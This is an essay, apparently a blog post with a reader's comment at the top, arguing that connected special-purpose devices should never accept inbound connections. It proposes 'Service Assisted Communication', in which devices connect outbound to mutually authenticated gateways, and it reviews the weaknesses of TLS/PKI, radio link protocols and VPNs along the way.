I want those devices off my private network rather than on it for those exact reasons. Exactly contrary to the "Intranet" mantra, I would want devices that want to piggyback on my home network to be banned from talking to anything but the outside network either by ways of a special flag in the MAC address and forced routing rules and/or by forcing them into an IPSec tunnel with the network gateway device. And I will only unblock them when I want to. Otherwise I'm perfectly fine with those device carrying their own GSM SIM or other long-range RF circuit and communicating with an external network when I have agreed to a policy to allow that and/or have explicitly enabled that functionality. I personally prefer for devices to rendezvous in public network space where they are considered as potentially hostile to each other.

I believe that the notion of by-default privileged mutual access for an arbitrary hodgepodge of devices by the sole fact that they are plugged into the same network is asking for trouble. Tricking devices into downloading and executing malicious payloads will be the favorite mass-exploitation vector for getting a local bridgehead into the home. Going through a local hub will help with that, but that will require that all devices will use it, which I consider wishful thinking at best. My second-most favorite vector and the one with the potential to inflict direct physical or monetary harm is parking a van in front of the house and going straight through poorly protected local radio traffic based on flawed standards with weak protection of which there are still many in home automation. That's something not out of reach for a skilled stalker or would-be burglar or a private investigator doing a "background check". So now you've got someone on the "Intranet".

I believe in the model of having federations of local and external gateways help with protecting and governing access to devices and laid this out in my previous post in great detail. But I also believe that we can't trust any of the devices we bring home from the store and that a notion of "Intranet" is naively dangerous and will become worse as we connect more devices. The privacy issue is one we need to tackle by (self-) regulatory means and by establishing a model that allows consumers to make informed decisions whether a product is trustworthy and we need to establish measures to audit this and also sanction violations. Privacy is not nearly as easy as cloud and local. Privacy is about trust, trustworthiness, and betrayal.

Categories:

There is good reason to be worried about the "Internet of Things" on current course and trajectory. Both the IT industry as well as manufacturers of "smart products" seem to look at connected special-purpose devices and sensors as a mere variation of the information technology assets like servers, PCs, tablets, or phones. That stance is problematic as it neglects important differences between the kinds of interactions that we're having with a phone or PC, and the interactions we're having with a special-purpose devices like a gas valve, a water heater, a glass-break sensor, a vehicle immobilizer, or a key fob.

Before I get to a proposal for how to address the differences, let's take a look at the state of things on the Web and elsewhere.

Information Devices

PCs, phones, and tablets are primarily interactive information devices. Phones and tablets are explicitly optimized around maximizing battery lifetime, and they preferably turn off partially when not immediately interacting with a person, or when not providing services like playing music or guiding their owner to a particular location. From a systems perspective, these information technology devices are largely acting as proxies towards people. They are "people actuators" suggesting actions and "people sensors" collecting input.

People can, for the most part, tell when something is grossly silly and/or could even put them into a dangerous situation. Even though there is precedent of someone driving off a cliff when told to do so by their navigation system, those cases are the rarest exceptions.

Their role as information gathering devices allowing people to browse the Web and to use a broad variety of services, requires these devices to be "promiscuous" towards network services. The design of the Web, our key information tool, centers on aggregating, combining, and cross referencing information from a myriad of different systems. As a result, the Web's foundation for secure communication is aligned with the goal of this architecture. At the transport protocol level, Web security largely focuses on providing confidentiality and integrity for fairly short-lived connections.

User authentication and authorization are layered on top, mostly at the application layer. The basic transport layer security model, including server authentication, builds on a notion of federated trust anchored in everyone (implicitly and largely involuntarily) trusting in a dozen handfuls of certification authorities (CA) chosen by their favorite operating system or browser vendor. If one of those CAs deems an organization trustworthy, it can issue a certificate that will then be used to facilitate secure connections, also meaning to express an assurance to the user that they are indeed talking to the site they expect to be talking to. To that end, the certificate can be inspected by the user. If they know and care where to look.

This federated trust system is not without issues. First, if the signing key of one of the certification authorities were to be compromised, potentially undetected, whoever is in possession of the key can now make technically authentic and yet forged certificates and use those to intercept and log communication that is meant to be protected. Second, the system is fairly corrupt as it takes all of $3 per year to buy a certification authority's trust with minimal documentation requirements. Third, the vast majority of users have no idea that this system even exists.

Yet, it all somehow works out halfway acceptably, because people do, for the most part, have common sense enough to know when something's not quite right, and it takes quite a bit of work to trick people into scams in huge numbers. You will trap a few victims, but not very many and not for very long. The system is flawed and some people get tricked, but that can also happen at the street corner. Ultimately, the worst that can happen – without any intent to belittle the consequences – is that people get separated from some of their money, or their identities get abused until the situation is corrected by intervention and, often, some insurance steps in to rectify these not entirely unexpected damages.

Special-Purpose Devices

Special-purpose devices, from simple temperature sensors to complex factory production lines with thousands of components inside them are different. The devices are much more scoped in purpose and even if they may provide some level of a people interface, they're largely scoped to interfacing with assets in the physical world. They measure and report environmental circumstances, turn valves, control servos, sound alarms, switch lights, and do many other tasks. They help doing work for which an information device is either too generic, too expensive, too big, or too brittle.

If something goes wrong with automated or remote controllable devices that can influence the physical world, buildings may burn down and people may die. That's a different class of damage than someone maxing out a stolen credit-card's limit. The security bar for commands that make things move, and also for sensor data that eventually results in commands that cause things to move, ought to be, arguably, higher than in an e-commerce or banking scenario.

What doesn't help on the security front is that machines, unlike most people, don't have a ton of common sense. A device that goes about its day in its programmed and scheduled ways has no notion of figuring when something it not quite right. If you can trick a device into talking to a malicious server or intermediary, or into following a network protocol redirection to one, it'll dutifully continue doing its work unless it's explicitly told to never do so.

Herein lies one of the challenges. A lot of today's network programming stacks and Web protocols are geared towards the information-oriented Web and excellently enable building promiscuous clients by default. In fact, the whole notion of REST rests on the assumption that the discovery and traversal of resources is performed though hypertext links included in the returned data. As the Web stacks are geared towards that model, there is extra work required to make a Web client faithful to a particular service and to validate, for instance, the signature thumbnail of the TLS certificate returned by the permitted servers. As long as you get to interact with the web stack directly, that's usually okay, but the more magic libraries you use on top of the Web stack basics, the harder that might get. And you have, of course, and not to be underestimated in complexity, to teach the device the right thumbnail(s) and thus effectively manage and distribute an allow-list.

Generally, device operators will not want to allow unobserved and non-interactive devices that emit telemetry and receive remote commands to be able to stray from a very well-defined set of services they're peered with. They should not be promiscuous. Quite the opposite.

Now – if the design goal is to peer a device with a particular service, the federated certificate circus turns into more of a burden than being a desired protocol-suite feature. As the basic assumptions about promiscuity towards services are turned on their head, the 3-6 KByte and 2 network roundtrips of certificate exchange chatter slow things down and also may cost quite a bit of real money paying for precious, metered wireless data volume. Even though everyone currently seems to assume Transport Layer Security (TLS) being the only secure channel protocol we'll ever need, it's far from being ideal for the 'faithful' connected devices scenario.

If you allow me to take you into the protocol basement for a second: That may be somewhat different if we could seed clients with TLS RFC5077 session resumption tickets in an out-of-band fashion, and have a TLS mode that never falls back to certs. Alas, we do not.

Bi-Directional Addressing

Connected and non-interactive devices not only differ in terms of the depth of their relationship with backend services, they also differ very much in terms of the interaction patterns with these services when compared to information-centric devices. I generally classify the interaction patterns for special-purpose devices into the categories Telemetry, Inquiries, Commands, and Notifications.

  • Telemetry is unidirectionally flowing information which the device volunteers to a collecting service, either on a schedule or based on particular circumstances. That information represents the current or temporally aggregated state of the device or the state of its environment, like readings from sensors that are associated with it.
  • With Inquiries, the device solicits information about the state of the world beyond its own reach and based on its current needs; an inquiry can be a singular request, but might also ask a service to supply ongoing updates about a particular information scope. A vehicle might supply a set of geo-coordinates for a route and ask for continuous traffic alert updates about particular route until it arrives at the destination.
  • Commands are service-initiated instructions sent to the device. Commands can tell a device to provide information about its state, or to change the state of the device, including activities with effects on the physical world. That includes, for instance, sending a command from a smartphone app to unlock the doors of your vehicle, whereby the command first flows to an intermediating service and from there it's routed to the vehicle's onboard control system.
  • Notifications are one-way, service-initiated messages that inform a device or a group of devices about some environmental state they'll otherwise not be aware of. Wind parks will be fed weather forecast information and cities may broadcast information about air pollution, suggesting fossil-fueled systems to throttle CO2 output or a vehicle may want to show weather or news alerts or text messages to the driver.

While Telemetry and Inquiries are device-initiated, their mirrored pattern counterparts, Command and Notifications, are service-initiated – which means that there must be a network path for messages to flow from the service to the device and that requirement bubbles up a set of important technical questions:

  • How can I address a device on a network in order to route commands and notifications to it?
  • How can I address a roaming and/or mobile device on a network in order to route commands and notifications to it?
  • How can I address a power constrained device on a network in order to route commands and notifications to it?
  • How can I send commands or notifications with latency that's acceptable for my scenario?
  • How can I ensure that the device only accepts legitimate commands and trustworthy notifications?
  • How can I ensure that the device is not easily susceptible to denial-of-service attacks that render it inoperable towards the greater system? (not good for building security sensors, for instance)
  • How can I do this with several 100,000 or millions of devices attached to a telemetry and control system?

Most current approaches that I'm running into are trying to answer the basic addressing question with traditional network techniques. That means that the device either gets a public network address or it is made part of a virtual network and then listens for incoming traffic using that address, acting like a server. For using public addresses the available options are to give the device a proper public IPv4 or IPv6 address or to map it uniquely to a well-known port on a network address translation (NAT) gateway that has a public address. As the available pool of IPv4 addresses has been exhausted and network operators are increasingly under pressure to move towards providing subscribers with IPv6 addresses, there's hope that every device could eventually have its very own routable IPv6 address. The virtual network approach is somewhat similar, but relies on the device first connecting to some virtual network gateway via the underlying native network, and then getting an address assigned within the scope of the virtual network, which it shares with the control system that will use the virtual network address to get to the device.

Both of those approaches are reasonable from the perspective of answering the first, basic addressing question raised above, and if you pretend for a moment that opening inbound ports through a residential edge firewall is acceptable. However, things get tricky enough once we start considering the other questions, like devices not being in the house, but on the road.

Roaming is tricky for addressing and even trickier if the device is switching networks or even fully mobile and thus hopping through networks and occasionally dropping connections as it gets out of radio range. While there are "Mobile IP" roaming standards for both IPv4 (RFC3344) and IPv6 (RFC6275), but those standards rely on a notion of traffic relaying through agents and those are problematic at scale with very large device populations as the relay will have to manage and relay traffic for very many routes and also needs to keep track of the devices hopping foreign networks. Relaying obviously also has significant latency implications with global roaming. What even the best implementations of these standards-based approaches for roaming can't solve is that you can't connect to a device that's outside of radio coverage and therefore not connected, at all.

The very same applies to the challenge of how to reliably deliver commands and notifications to power-constrained devices. Those devices may need to survive on battery power for extended periods (in some cases for years) between battery recharges, or their external power source, like "power stealing" circuits employed in home building automation devices, may not yield sufficient power for sustained radio connectivity to a base station. Even a vehicle battery isn't going to like powering an always-on radio when parked in the long-term airport garage while you're on vacation for 2 weeks.

So if a device design aims to conserve power by only running the radio occasionally or if the device is mobile and frequently in and out of radio coverage or hopping networks, it gets increasingly difficult to reach it naively by opening a network connection to it and then hoping for that to remain stable if you're lucky enough to catch a moment when the device is indeed ready to talk. That's all even assuming that the device were indeed having a stable network address provided by one of the cited "Mobile IP" standards, or the device was registering with an address registration/lookup service every time it comes online with a new address so that the control service can locate it.

All these approaches aiming to provide end-to-end network routes between devices and their control services are almost necessarily brittle. As it tries to execute a command, the service needs to locate the device, establish a connection to it, issue the command and collect the command feedback all while, say, a vehicle drives through a series of tunnels. Not only does this model rely on the device being online and available at the required moment, it also introduces a high number of tricky-to-diagnose failure points (such as the device flipping networks right after the service resolved its address) with associated security implications (who gets that newly orphaned address next?), it also has inherent reliability issues at the application layer since all faults that occur after the control system has sent the command, do introduce doubt in the control system on whether the command could be successfully executed; and not all commands are safe to just blindly retry, especially when they have physical consequences.

For stationary power constrained or wirelessly connected devices, the common approach to bridging the last meters/yards is a hub device that's wired to the main network and can bridge to the devices that live on a local network. The WLAN hub(s) in many homes and buildings are examples of this as there is obviously a need to bridge between devices roaming around house and the ISP network. From an addressing perspective, these hubs don't change the general challenge much as they themselves need to be addressable for commands they then ought to forward to the targeted device and that means you're still opening up a hole in the residential firewall, either by explicit configuration or via (don't do this) UPnP.

If all this isn't yet challenging enough for your taste, there's still security. Sadly, we can't have nice and simple things without someone trying to exploit them for malice or stupid "fun".

Trustworthy Communication

All information that's being received from and sent to a device must be trustworthy if anything depends on that information – and why would you send it otherwise? "Trustworthy communication" means that information is of verifiable origin, correct, unaltered, timely, and cannot be abused by unauthorized parties in any fashion. Even telemetry from a simple sensor that reports a room's temperature every five minutes can't be left unsecured. If you have a control system reacting on that input or do anything else with that data, the device and the communication paths from and to it must be trustworthy.

"Why would anyone hack temperature sensors?" – sometimes "because they can", sometimes because they want to inflict monetary harm on the operator or physical harm on the facility and what's in it. Neglecting to protect even one communication path in a system opens it up for manipulation and consequential harm.

If you want to believe in the often-cited projection of 50 billion connected devices by 2020, the vast majority of those will not be classic information devices, and they will not be $500 or even $200 gadgets. Very many of these connected devices will rather be common consumer or industry goods that have been enriched with digital service capabilities. Or they might even just be super inexpensive sensors hung off the side of buildings to collect environmental information. Unlike apps on information devices, most of these services will have auxiliary functions. Some of these capabilities may be even be largely invisible. If you have a device with built-in telemetry delivery that allows the manufacturer or service provider to sense an oncoming failure and proactively get in touch with you for service – which is something manufacturers plan to do – and then the device just never breaks, you may even not know such a capability exists, especially if the device doesn't rely on connectivity through your own network. In most cases, these digital services will have to be priced into the purchase price of the product or even be monetized through companion apps and services as it seems unlikely that consumers will pay for 20 different monthly subscriptions connected appliances. It's also reasonable to expect that many devices sold will have the ability to connect, but their users will never intentionally take advantage these features.

On the cost side, a necessary result from all this is that the logic built into many products will (continue to) use microcontrollers that require little power, have small footprint, and are significantly less expensive than the high-powered processors and ample memory in today's information devices – trading compute power for much reduced cost. But trading compute power and memory for cost savings also means trading cryptographic capability and more generally resilience against potential attacks away.

The horror-story meme "if you're deep into the forest nobody will hear your screams" is perfectly applicable to unobserved field-deployed devices under attack. If a device were to listen for unsolicited traffic, meaning it listens for incoming TCP connections or UDP datagrams or some form of UDP-datagram based sessions and thus acting as server, it would have to accept and then triage those connection attempts into legitimate and illegitimate ones.

With TCP, even enticing the device to accept a connection is already a very fine attack vector, because a TCP connection burns memory in form of a receive buffer. So if the device were to use a network protocol circuit like, for instance, the WizNet W5100 used one the popular enthusiast tinker platform Arduino Ethernet, the device's communication capability is saturated at just 4 connections, which an attacker could then service in a slow byte-per-packet fashion and thus effectively take the device out. As that happens, the device now also wouldn't have a path to scream for help through, unless it made – assuming the circuit supports it – an a priori reservation of resources for an outbound connection to whoever plays the cavalry.

If we were to leave the TCP-based resource exhaustion vector out of the picture, the next hurdle is to establish a secure baseline over the connection and then triaging connections into good and bad. As the protocol world stands, TLS (RFC5246) and DTLS (RFC6347) are the kings of the security protocol hill and I've discussed the issues with their inherent client promiscuity assumption above. If we were indeed connecting from a control service to a device in an outbound fashion, and the device were to act as server, the model may be somewhat suitable as the control service will indeed have to speak to very many and potentially millions of devices. But contrary to the Web model where the browser has no idea where the user will send it, the control system has a very firm notion of the devices it wants to speak to. There are many of those, but there no promiscuity going on. If they play server, each device needs to have its own PKI certificate (there is a specified option to use TLS without certificates, but that does not matter much in practice) with their own private key since they're acting as servers and since you can't leak shared private keys into untrusted physical space, which is where most of the devices will end up living.

The strategy of using the standard TLS model and having the device play server has a number of consequences. First, whoever provisions the devices will have to be a root or intermediate PKI certification authority. That's easy to do, unless there were any need to tie into the grand PKI trust federation of today's Web, which is largely anchored in the root certificate store contents of today's dominant client platforms. If you had the notion that "Internet of Things" were to mean that every device could be a web server to everyone, you would have to buy yourself into the elite circle of intermediate CA authorities by purchasing the necessarily signing certificates or services from a trusted CA and that may end up being fairly expensive as the oligopoly is protective of their revenues. Second, those certificates need to be renewed and the renewed ones need to be distributed securely. And when devices get stolen or compromised or the customer opts out of the service, these certificates also need to get revoked and that revocation service needs to be managed and run and will have to be consulted quite a bit.

Also, the standard configuration of most application protocol stacks' usage of TLS tie into DNS for certificate validation, and it's not obvious that DNS is the best choice for associating name and network address for devices that rapidly hop networks when roaming – unless of course you had a stable "home network" address as per the IPv6 Mobile IP. But that would mean you are now running an IPv6 Mobile relay. The alternative is to validate the certificate by some other means, but then you'll be using a different validation criterion in the certificate subject and will no longer be aligned with the grand PKI trust federation model. Thus, you'll be are back to effectively managing an isolated PKI infrastructure, with all the bells and whistles like a revocation service, and you will do so while you're looking for the exact opposite of the promiscuous security session model all that enables.

Let's still assume none of that would matter and (D)TLS with PKI dragged in its wake were okay and the device could use those and indeed act as a server accepting inbound connections. Then we're still faced with the fact that cryptography computation is not cheap. Moving crypto into hardware is very possible, but impacts the device cost. Doing crypto in software requires that the device deals with it inside of the application or underlying frameworks. And for a microcontroller that costs a few dollars that's non-negligible work. So the next vector to keep the device from doing its actual work is to keep it busy with crypto. Present it with untrusted or falsely signed client certificates (if it were to expect those). Create a TLS link (even IPSec) and abandon it right after the handshake. Nice ways to burn some Watts.

Let's still pretend none of this were a problem. We're now up at the application level with transport layer security underneath. Who is authorized to talk to the device and which of the connections that pop up through that transport layer are legitimate? And if there is an illegitimate connection attempt, where do you log these and if that happens a thousand times a minute, where do you hold the log and how do you even scream for help if you're pegged on compute by crypto? Are you keeping an account store in the device? Quite certainly not in a system whose scope is more than one device. Are you then relying on an external authentication and authorization authority issuing authorization tokens? That's more likely, but then you're already running a token server.

The truth, however inconvenient, is that non-interactive special-purpose devices residing in untrusted physical spaces are, without getting external help from services, essentially indefensible as when acting as network servers. And this is all just on top of the basic fact that devices that live in untrusted physical space are generally susceptible to physical exploitation and that protecting secrets like key material is generally difficult.

Here's the recipe to eradicate most of the mess I've laid out so far: Devices don't actively listen on the network for inbound connections. Devices act as clients. Mostly.

Link vs. Network vs. Transport vs. Application

What I've discussed so far are considerations around the Network and Transport layers (RFC1122, 1.1.3) as I'm making a few general assumptions about connectivity between devices and control and telemetry collections systems, as well as about the connectivity between devices when they're talking in a peer-to-peer fashion.

First, I have so far assumed that devices talk to other systems and devices through a routable (inter-)network infrastructure whose scope goes beyond a single Ethernet hub, WLAN hotspot, Bluetooth PAN, or cellular network tower. Therefore I am also assuming the usage of the only viable routable network protocol suite and that is the Internet Protocol (v4 and v6) and with that the common overlaid transport protocols UDP and TCP.

Second, I have so far assumed that the devices establish a transport-level and then also application-level network relationship with their communication peers, meaning that the device commits resources to accepting, preprocessing, and then maintaining the connection or relationship. That is specifically true for TCP connections (and anything riding on top of it), but is also true for Network-level links like IPSec and session-inducing protocols overlaid over UDP, such as setting up agreements to secure subsequent datagrams as with DTLS.

The reason for assuming a standards-based Network and Transport protocol layer is that everything at the Link Layer (including physical bits on wire or through space) is quite the zoo, and one that I see growing rather than shrinking. The Link Layer will likely continue to be a space of massive proprietary innovation around creative use of radio frequencies, even beyond what we've seen in cellular network technology where bandwidth from basic GSM's 9.6Kbit/s to today's 100+ MBit/s on LTE in the last 25 years. There are initiatives to leverage new "white space" spectrums opened up by the shutdown of Analog TV, and there are services leveraging ISM frequency bands, and there might be well-funded contenders for licensed spectrum emerging that use wholly new stacks. There is also plenty of action on the short-range radio front, specifically also around suitable protocols for ultra-low power devices. And there are obviously also many "wired" transport options over fiber and copper that have made significant progress and will continue to do so and are essential for device scenarios, often in conjunction with a short-range radio hop for the last few meters/yards. Just as much as it was a losing gamble to specifically bet on TokenRing or ARCnet over Ethernet in the early days of Local Area Networking, it isn't yet clear what to bet on in terms of protocols and communication service infrastructures as the winners for the "Internet of Things", not even today's mobile network operators.

Betting on a particular link technology for inter-device communication is obviously reasonable for many scenarios where the network is naturally scoped by physical means like reach by ways of radio frequency and transmission power, the devices are homogeneous and follow a common and often regulation-imposed standard, and latency requirements are very narrow, bandwidth requirements are very high, or there is no tolerance for failure of intermediaries. Examples for this are in-house device networks for home automation and security, emerging standards for Vehicle-To-Vehicle (V2V) and Vehicle-To-Infrastructure (V2I) communication, or Automatic Dependent Surveillance (ADS, mostly ADS-B) in Air Traffic Control. Those digital radio protocols essentially form peer meshes where everyone listens to everything in range and filters out what they find interesting or addressed specifically at them. And if the use of the frequencies gets particularly busy, coordinated protocols impose time slices on senders.

What such link-layer or direct radio information transfers have generally struggled with is trustworthiness – allow me to repeat: verifiable origin, correct, unaltered, timely, and cannot be abused by unauthorized parties in any fashion.

Of course, by its nature, all radio based communication is vulnerable to jamming and spoofing, which has a grand colorful military history as an offensive or defensive electronic warfare measure along with fitting countermeasures (ECM) and even counter-countermeasures (ECCM). Radio is also, especially when used in an uncoordinated fashion, subject to unintended interference and therefore distortion.

ADS-B, which is meant to replace radar in Air Traffic Control doesn't even have any security features in its protocol. The stance of the FAA is that they will detect spoofing by triangulation of the signals, meaning they can tell whether a plane that say it's at a particular position is actually there. We should assume they have done their ECM and ECCM homework.

IEEE 1609 for Wireless Access in Vehicular Environments that's aiming to facilitate ad-hoc V2V and V2I communication, spells out an elaborate scheme to manage and use and roll X.509 certificates, but relies on the broad distribution of certificate revocation lists to ban once-issued certificates from the system. Vehicles are sold, have the telematics units replaced due to malfunction or crash damage, may be tampered with, or might be stolen. I can see the PKI's generally overly optimistic stance on revocations being challenging at the scale of tens if not hundreds of million vehicles, where churn will be very significant. The Online Certificate Status Protocol (OCSP, RFC6960) might help IEEE 1609 deal with the looming CRL caching issues due to size, but then requires very scalable validation server infrastructure that needs to be reachable whenever two vehicles want to talk, which is also not acceptable.

Local radio link protocols such as Bluetooth, WLAN (802.11x with 802.11i/WPA2-PSK), or Zigbee often assume that participants in a local link network share a common secret, and can keep that secret secret. If the secret leaks, all participants need to be rolled over to a new key. IEEE 802.1X, which is the foundation for the RADIUS Authentication and Authorization of participants in a network, and the basis of "WPA2 Enterprise" offers a way out of the dilemma of either having to rely on a federated trust scheme that has a hard time dealing with revocations of trust at scale, or on brittle pre-shared keys. 802.1X introduces the notion of an Authentication (and Authorization) server, which is a neutral third party that makes decisions about who gets to access the network.

Unfortunately, many local radio link protocols are not only weak at managing access, they also have a broad history of having weak traffic protection. WLAN's issues got largely cleaned up with WPA2, but there are plenty of examples across radio link protocols where the broken WEP model or equivalent schemes are in active use, or the picture is even worse. Regarding the inherent security of cellular network link-level protection, it ought to be sufficient to look at the recent scolding of politicians in Europe for their absent-mindedness to use regular GSM/UMTS phones without extra protection measures – and the seemingly obvious result of dead-easy eavesdropping by foreign intelligence services. Ironically, mobile operators make some handsome revenue by selling "private access points" (private APNs) that terminate cellular device data traffic in a VPN and that the customer then tunnels into across the hostile Internet to meet the devices on this fenced-off network, somehow pretending that the mobile network somehow isn't just another operator-managed public network and therefore more trustworthy.

Link-layer protection mechanisms are largely only suitable for keeping unauthorized local participants (i.e. intruders) from getting link-layer data frames up to any higher-level network logic. In link-layer-scoped peer-to-peer network environments, the line between link-layer data frames and what's being propagated to the application is largely blurred, but the previous observation stays true. Even if employed, link-layer security mechanisms are not much help on providing security on the network and transport layers, as many companies are learning the hard way when worms and other exploits sweep through the inside of their triply-firewalled, WPA2 protected, TPM-tied-IPSec-protected networks, or as travelers can learn when they don't have a local firewall up on their machine or use plaintext communication when connecting to the public network at a café, airport, or hotel.

Of course, the insight of public networks not being trustworthy has led many companies interconnecting sites and devices down the path of using virtual private network (VPN) technology. VPN technology, especially when coming in the form of a shiny appliance, makes it very easy to put a network tunnel terminator on either end of a communication path made up of a chain of untrustworthy links and networks. The terminator on either end conveniently surfaces up as a link-layer network adapter. VPN can fuse multiple sites into a single link-layer network and it is a fantastic technology for that. But like all the other technologies I discussed above, link-layer protection is a zoning mechanism, the security mechanisms that matter to protect digital assets and devices sit at the layers above it. There is no "S" for Security in "VPN". VPN has secure virtual network cables, it doesn't make the virtual hub more secure that they plug into. Also, in the context of small devices as discussed above, VPN is effectively a non-starter due to its complexity.

What none of these link-layer protection mechanisms help with, including VPN, is to establish any notion of authentication and authorization beyond their immediate scope. A network application that sits on the other end of a TCP socket, where a portion of the route is facilitated by any of these link layer mechanisms, is and must be oblivious to their existence. What matters for the trustworthiness of the information that travels from the logic on the device to a remote control system not residing on the same network, as well as for commands that travel back up to the device, is solely a fully protected end-to-end communication path spanning networks, where the identity of the parties is established at the application layer, and nothing else. The protection of the route at the transport layer by ways of signature and encryption is established as a service for the application layer either after the application has given its permission (e.g. certificate validation hooks) or just before the application layer performs an authorization handshake, prior entering into any conversations. Establishing end-to-end trust is the job of application infrastructure and services, not of networks.

Service Assisted Communication

The findings from this discussion so far can be summarized in a few points:

  • Remote controllable special-purpose devices have a fundamentally different relationship to network services compared to information devices like phones and tablets and require an approach to security that enables exclusive peering with a set of services or a gateway.
  • Devices that take a naïve approach to connectivity by acting like servers and expecting to accept inbound connections pose a number of network-related issues around addressing and naming, and even greater problems around security, exposing themselves to a broad range of attack vectors.
  • Link-layer security measures have varying effectiveness at protecting communication between devices at a single network scope, but none is sufficient to provide a trustworthy communication path between the device and a cloud-based control system or application gateway.
  • The PKI trust model is fundamentally flawed in a variety of ways, including being too static and geared towards long-lived certificates, and it's too optimistic about how well certificates are and can be protected by their bearers. Its use in the TLS context specifically enables the promiscuous client model, which is the opposite of the desired model for special-purpose devices.
  • Approaches to security that provide a reasonable balance between system throughput, scalability, and security protection are generally relying on third party network services that validates user credentials against a central pool, issues security tokens, or validates assurances made by an authority for their continued validity.

The conclusion I draw from these findings is an approach I call "Service Assisted Communication" (SAC). I'm not at all claiming the principles and techniques being an invention, as most are already broadly implemented and used. But I do believe there is value in putting them together here and to give them a name so that they can be effectively juxtaposed with the approaches I've discussed above.

The goal of Service Assisted Communication is to establishing trustworthy and bi-directional communication paths between control systems and special-purpose devices that are deployed in untrusted physical space. To that end, the following principles are established:

  • Security trumps all other capabilities. If you can't implement a capability securely, you must not implement it. You identify threats and mitigate them or you don't ship product. If you employ a mitigation without knowing what the threat is you don't ship product, either.
  • Devices do not accept unsolicited network information. All connections and routes are established in an outbound-only fashion.
  • Devices generally only connect to or establish routes to well-known services that they are peered with. In case they need to feed information to or receive commands from a multitude of services, devices are peered with a gateway that takes care of routing information downstream, and ensuring that commands are only accepted from authorized parties before routing them to the device
  • The communication path between device and service or device and gateway is secured at the application protocol layer, mutually authenticating the device to the service or gateway and vice versa. Device applications do not trust the link-layer network
  • System-level authorization and authentication must be based on per-device identities, and access credentials and permissions must be near-instantly revocable in case of device abuse.
  • Bi-directional communication for devices that are connected sporadically due to power or connectivity concerns may be facilitated through holding commands and notifications to the devices until they connect to pick those up.
  • Application payload data may be separately secured for protected transit through gateways to a particular service

The manifestation of these principles is the simple diagram on the right. Devices generally live in local networks with limited scope. Those networks are reasonably secured, with link-layer access control mechanisms, against intrusion to prevent low-level brute-force attacks such as flooding them with packets and, for that purpose, also employ traffic protection. The devices will obviously observe link-layer traffic in order to triage out solicited traffic, but they do not react to unsolicited connection attempts that would cause any sort of work or resource consumption from the network layer on up.

All connections to and from the device are made via or at least facilitated via a gateway, unless the device is peered with a single service, in which case that service takes on the role of the gateway. Eventual peer-to-peer connections are acceptable, but only if the gateway permits them and facilitates a secure handshake. The gateway that the device peers with may live on the local network and thus govern local connections. Towards external networks, the local gateway acts as a bridge towards the devices and is itself connected by the same set of principles discussed here, meaning it's acting like a device connected to an external gateway.

When the device connects to an external gateway, it does so by creating and maintaining an outbound TCP socket across a network address translation boundary (RFC2663), or by establishing a bi-directional UDP route, potentially utilizing the RFC5389 session traversal utilities for NAT, aka STUN. Even though I shouldn't have to, I will explicitly note that the WebSocket protocol (RFC6455) rides on top of TCP and gets its bi-directional flow capability from there. There's quite a bit of bizarre information on the Interwebs on how the WebSocket protocol somehow newly and uniquely enables bi-directional communication, which is obviously rubbish. What it does is to allow port-sharing, so that WebSocket aware protocols can share the standard HTTP/S ports 80 (RFC2616) and 443 (RFC2818) with regular web traffic and also piggyback on the respective firewall and proxy permissions for web traffic. The in-progress HTTP 2.0 specification will expand this capability further.

By only relying on outbound connectivity, the NAT/Firewall device at the edge of the local network will never have to be opened up for any unsolicited inbound traffic.

The outbound connection or route is maintained by either client or gateway in a fashion that intermediaries such as NATs will not drop it due to inactivity. That means that either side might send some form of a keep-alive packet periodically, or even better sends a payload packet periodically that then doubles as a keep-alive packet. Under most circumstances it will be preferable for the device to send keep-alive traffic as it is the originator of the connection or route and can and should react to a failure by establishing a new one.

As TCP connections are endpoint concepts, a connection will only be declared dead if the route is considered collapsed and the detection of this fact requires packet flow. A device and its gateway may therefore sit idle for quite a while believing that the route and connection is still intact before the lack of acknowledgement of the next packet confirms that assumption is incorrect. There is a tricky tradeoff decision to be made here. So-called carrier-grade NATs (or Large Scale NAT) employed by mobile network operators permit very long periods of connection inactivity and mobile devices that get direct IPv6 address allocations are not forced through a NAT, at all. The push notification mechanisms employed by all popular Smartphone platforms utilize this to dramatically reduce the power consumption of the devices by maintaining the route very infrequently, once every 20 minutes or more, and therefore being able to largely remain in sleep mode with most systems turned off while idly waiting for payload traffic. The downside of infrequent keep-alive traffic is that the time to detection of a bad route is, in the worst-case, as long as the keep-alive interval. Ultimately it's a tradeoff between battery-power and traffic-volume cost (on metered subscriptions) and acceptable latency for commands and notifications in case of failures. The device can obviously be proactive in detecting potential issues and abandon the connection and create a new one when, for instance, it hops to a different network or when it recovers from signal loss.

The connection from the device to the gateway is protected end-to-end and ignoring any underlying link-level protection measures. The gateway authenticates with the device and the device authenticates with the gateway, so neither is anonymous towards the other. In the simplest case, this can occur through the exchange of some proof of possession of a previously shared key. It can also happen via a (heavy) X.509 certificate exchange as performed by TLS, or a combination of a TLS handshake with server authentication where the device subsequently supplies credentials or an authorization token at the application level. The privacy and integrity protection of the route is also established end-to-end, ideally as a byproduct of the authentication handshake so that a potential attacker cannot waste cryptographic resources on either side without producing proof of authorization.

The current best option is a combination of the simple authentication model of SSH (pre-shared keys) with the established foundation of TLS. Luckily, this exists in the form of TLS-PSK (RFC4279), which enables pre-shared keys as credentials, and eliminates the weight of the X.509 certificate handling and wire-level exchange. The pre-shared key can be used as the session key proper (in the simplest case) or can be used as a credential and basis for a Diffie-Hellman session key exchange. The result is a fairly lightweight mechanism that can build on a narrow set of algorithms (like AES-256, SHA-256) on compute and library-footprint-constrained constrained devices, and still is compatible with all application layer protocols that rely on TLS.

The result of the application-level handshake is a secure peer connection between the device and a gateway that only the gateway can feed. The gateway can, in turn, now provide one or even several different APIs and protocol surfaces, that can be translated to the primary bi-directional protocol used by the device. The gateway also provides the device with a stable address in form of an address projected onto the gateway's protocol surface and therefore also with location transparency and location hiding.

The device could only speak AMQP or MQTT or some proprietary protocol, and yet have a full HTTP/REST interface projection at the gateway, with the gateway taking care of the required translation and also of enrichment where responses from the device can be augmented with reference data, for instance. The device can connect from any context and can even switch contexts, yet its projection into the gateway and its address remains completely stable. The gateway can also be federated with external identity and authorization services, so that only callers acting on behalf of particular users or systems can invoke particular device functions. The gateway therefore provides basic network defense, API virtualization, and authorization services all combined into in one.

The gateway model gets even better when it includes or is based on an intermediary messaging infrastructure that provides a scalable queuing model for both ingress and egress traffic.

